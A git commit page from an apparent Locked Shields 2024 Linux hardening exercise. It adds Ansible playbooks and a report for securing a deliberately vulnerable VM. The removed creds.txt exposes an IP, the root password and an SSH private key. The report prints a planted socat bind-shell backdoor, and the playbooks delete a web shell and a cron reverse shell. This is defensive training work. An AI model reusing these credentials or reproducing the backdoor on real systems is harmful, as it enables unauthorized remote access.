spanskiduh
/
ls-2024-selection
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

Add ansible playbooks

master
Gašper Spagnolo 2024-02-02 12:18:11 +01:00
parent 9dca42d692
commit f4b89117bd
10 changed files with 228 additions and 56 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

19
ansible/creds.txt
View File

@ -1,19 +0,0 @@
Welcome to Locked Shields 2024 Linux challenge. Here are the credentials to your
VM with all the tasks described after first login.
VM details:
- IP: 64.227.120.192
- Username: root
- Password: Admin1Admin1
- ssh access key:
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW
QyNTUxOQAAACDvwy4nRU7fgRGvGGxShNQ8Mo24XcYYGSRmWAzrGxRlYQAAALAQAixuEAIs
bgAAAAtzc2gtZWQyNTUxOQAAACDvwy4nRU7fgRGvGGxShNQ8Mo24XcYYGSRmWAzrGxRlYQ
AAAEB7zUu4b0VNeTX7zTwE5DQNXABZ26tw1EhOMZ0B/yCmgu/DLidFTt BEa8YbFKE1Dwy
jbhdxhgZJGZYDOsbFGVhAAAAJm5lamNASmVybmVqLVBvcmVudGFzLU1hY0Jvb2stUHJvLm
xvY2FsAQIDBAUGBw==
-----END OPENSSH PRIVATE KEY-----
This message can be viewed only once, so don't forget to store the credentials.

35
ansible/files/nginx_secure_config.j2 Normal file
View File

@ -0,0 +1,35 @@
iserver {
listen 443 ssl default_server;
listen [::]:443 ssl default_server;
include snippets/snakeoil.conf;
root /var/www/html;
index index.html index.htm index.php;
listen 80 default_server;
server_name _;
location /2048/ {
proxy_pass http://localhost:8018/;
proxy_set_header Host $host;
# Add security headers
add_header X-Frame-Options "SAMEORIGIN";
add_header X-Content-Type-Options "nosniff";
add_header X-XSS-Protection "1; mode=block";
}
location / {
try_files $uri $uri/ =404;
}
location ~ \.php$ {
include snippets/fastcgi-php.conf;
fastcgi_pass unix:/run/php/php-fpm.sock;
}
location ~ /\. {
deny all;
}
}

37
ansible/notes.txt
View File

@ -1,37 +0,0 @@
Last login: Thu Feb 1 14:51:05 2024 from 89.212.81.147
_ _ _ _____ _ _ _ _ ___ _ _
| | | | | |/ ____| | (_) | | | | |__ \| || |
| | ___ ___| | _____ __| | (___ | |__ _ ___| | __| |___ ) | || |_
| | / _ \ / __| |/ / _ \/ _` |\___ \| '_ \| |/ _ \ |/ _` / __| / /|__ _|
| |___| (_) | (__| < __/ (_| |____) | | | | | __/ | (_| \__ \/ /_ | |
|______\___/ \___|_|\_\___|\__,_|_____/|_| |_|_|\___|_|\__,_|___/____| |_|
Welcome to the very vulnerable VM, somewhat similar what we can expect at Locked
Shields.
There are few tasks for you:
- protect the VM preserving the following services in running (and secure)
state:
- web server
- ssh server: all users (including root) should be allowed to login
- dns server
- identify as many vulnerabilities in the VM as possible
- all passwords are set to `Admin1Admin1`. You are encouraged to change them.
- write down the vulnerabilities with short explanation what this vulnerability
can cause
- write ansible playbook (preferred) or a bash script, which will mitigate the
vulnerabilities and will still serve the web, ssh and dns services
- share the "documentation" with description of identified vulnerabilities and
code to lockedshields@ssrd.io. Github links preferred.
Some notes:
- the VM will be forcefully shutdown so make changes permanent
- root user should be allowed to login from 138.68.128.150 with the following ssh
keys:
- ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIC55vv1HAHwUOxZ+Zn4IcswclUkLEP2eA0tJG3BwE0pO
- ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAINKOliO5L0TA84lclwmsdu+Wcm/r3LDQH9G2jICZ3ECC
- defense (and documentation, either through code or description) is more
important than finding vulnerabilities
- you do not need to go into details explaining vulnerabilities
- we will share the planted vulnerabilities afterwards

33
ansible/playbooks/01-secure-nginx-server.yml Normal file
View File

@ -0,0 +1,33 @@
---
- name: Secure Nginx Web Server
hosts: your_web_server
become: yes
tasks:
- name: Copy nginx configuration file with XSS protection and dot file access denial
template:
src: nginx_secure_config.j2
dest: /etc/nginx/sites-available/default
notify:
- Reload Nginx
- name: Ensure nginx snakeoil.conf is included
lineinfile:
path: /etc/nginx/sites-available/default
regexp: '^include snippets/snakeoil.conf;'
line: 'include snippets/snakeoil.conf;'
notify:
- Reload Nginx
- name: Ensure nginx PHP location is configured correctly
lineinfile:
path: /etc/nginx/sites-available/default
regexp: '^location ~ \.php\$ {'
line: 'location ~ \.php$ {'
notify:
- Reload Nginx
handlers:
- name: Reload Nginx
systemd:
name: nginx
state: restarted

7
ansible/playbooks/02-delete-podman-shell.yml Normal file
View File

@ -0,0 +1,7 @@
---
- name: Delete shell.php in Podman container
hosts: localhost
gather_facts: no
tasks:
- name: Run Podman command to delete shell.php
command: "podman exec -it 4d05d4a1a404 rm -f /var/www/html/shell.php"

13
ansible/playbooks/03-unset-and-kill.yml Normal file
View File

@ -0,0 +1,13 @@
---
- name: Unset functions and kill processes
hosts: your_target_host
become: yes
tasks:
- name: Unset functions netstat, ps, pstree, and ss
shell: unset -f netstat ps pstree ss
ignore_errors: yes
- name: Find and kill processes using port 2227
shell: |
ss -ltnp | grep ':2227' | awk '{print $6}' | sed 's/.*pid=//;s/,.*//' | xargs kill -9
ignore_errors: yes

42
ansible/playbooks/04-update-sshd-config.yml Normal file
View File

@ -0,0 +1,42 @@
---
- name: Update SSH server configuration
hosts: your_target_host
become: yes
tasks:
- name: Disable empty password login
lineinfile:
path: /etc/ssh/sshd_config
regexp: '^PermitEmptyPasswords'
line: 'PermitEmptyPasswords no'
notify:
- Restart SSH
- name: Disable password authentication
lineinfile:
path: /etc/ssh/sshd_config
regexp: '^PasswordAuthentication'
line: 'PasswordAuthentication no'
notify:
- Restart SSH
- name: Update AuthorizedKeysFile
lineinfile:
path: /etc/ssh/sshd_config
regexp: '^AuthorizedKeysFile'
line: 'AuthorizedKeysFile .ssh/authorized_keys'
notify:
- Restart SSH
- name: Remove other AuthorizedKeysFile settings
replace:
path: /etc/ssh/sshd_config
regexp: '^AuthorizedKeysFile.*'
replace: ''
notify:
- Restart SSH
handlers:
- name: Restart SSH
service:
name: sshd
state: restarted

15
ansible/playbooks/05-remove-cron-rev-shell.yml Normal file
View File

@ -0,0 +1,15 @@
---
- name: Remove and restart cron job
hosts: your_target_host
become: yes
tasks:
- name: Remove the specified cron job
lineinfile:
path: /etc/cron.d/e2scrub_all # Specify the path to your cron job file
regexp: '^(.*/sbin/xfsscrub_all.*)$' # Match the line containing /sbin/xfsscrub_all
state: absent # Remove the line if found
- name: Restart the cron service
service:
name: cron
state: restarted

19
ansible/playbooks/06-fix-mysqldb-permissions.yml Normal file
View File

@ -0,0 +1,19 @@
---
- name: Fix MySQL systemd service and restart MySQL
hosts: your_target_host
become: yes
tasks:
- name: Remove --skip-grant-tables from mysql.service file
lineinfile:
path: /lib/systemd/system/mysql.service
regexp: '^ExecStart=/usr/sbin/mysqld --skip-grant-tables'
line: 'ExecStart=/usr/sbin/mysqld'
notify:
- Reload and Restart MySQL
- name: Reload and Restart MySQL
systemd:
name: mysql
state: restarted
ignore_errors: yes

64
report/Report.md
View File

@ -392,6 +392,8 @@ ss ()
} }
``` ```
Tried: Tried:
```bash ```bash
@ -417,6 +419,15 @@ root@ls-2024-9:/etc/ssh# ss -ltnp | grep ':2227' | awk '{print $6}' | sed 's/.*p
1673 1673
``` ```
After some time reverse shell is back.
```bash
root 1672 0.0 0.1 4172 1952 ? Ss 08:01 0:00 SCREEN -d -m /usr/bin/socat TCP6-LISTEN:2227,reuseaddr,fork EXEC:/usr/bin/bash,stderr
root 1673 0.0 0.0 10292 900 pts/1 Ss+ 08:01 0:00 \_ /usr/bin/socat TCP6-LISTEN:2227,reuseaddr,fork EXEC:/usr/bin/bash,stderr
```
Killed it and I hope it does not come back.
### e bit in pexec ### e bit in pexec
```bash ```bash
@ -747,3 +758,56 @@ grep -R "meta l4proto tcp ip saddr 10.88.0.0/16 tcp dport 8018 counter packets"
Returns empty match. Returns empty match.
But iguess this is just for the container to communicate. Nothing to worry about iguess. But iguess this is just for the container to communicate. Nothing to worry about iguess.
### SMTP
```bash
# See /usr/share/postfix/main.cf.dist for a commented, more complete version
# Debian specific: Specifying a file name will cause the first
# line of that file to be used as the name. The Debian default
# is /etc/mailname.
#myorigin = /etc/mailname
smtpd_banner = $myhostname ESMTP $mail_name (Ubuntu)
biff = no
# appending .domain is the MUA's job.
append_dot_mydomain = no
# Uncomment the next line to generate "delayed mail" warnings
#delay_warning_time = 4h
readme_directory = no
# See http://www.postfix.org/COMPATIBILITY_README.html -- default to 3.6 on
# fresh installs.
compatibility_level = 3.6
# TLS parameters
smtpd_tls_cert_file=/etc/ssl/certs/ssl-cert-snakeoil.pem
smtpd_tls_key_file=/etc/ssl/private/ssl-cert-snakeoil.key
smtpd_tls_security_level=may
smtp_tls_CApath=/etc/ssl/certs
smtp_tls_security_level=may
smtp_tls_session_cache_database = btree:${data_directory}/smtp_scache
smtpd_relay_restrictions = permit_mynetworks permit_sasl_authenticated defer_unauth_destination
myhostname = ls-2024-9
alias_maps = hash:/etc/aliases
alias_database = hash:/etc/aliases
mydestination = $myhostname, ls-2024-9, localhost.localdomain, , localhost
relayhost =
mynetworks = 127.0.0.0/8 [::ffff:127.0.0.0]/104 [::1]/128
mailbox_size_limit = 0
recipient_delimiter = +
inet_interfaces = all
inet_protocols = all
```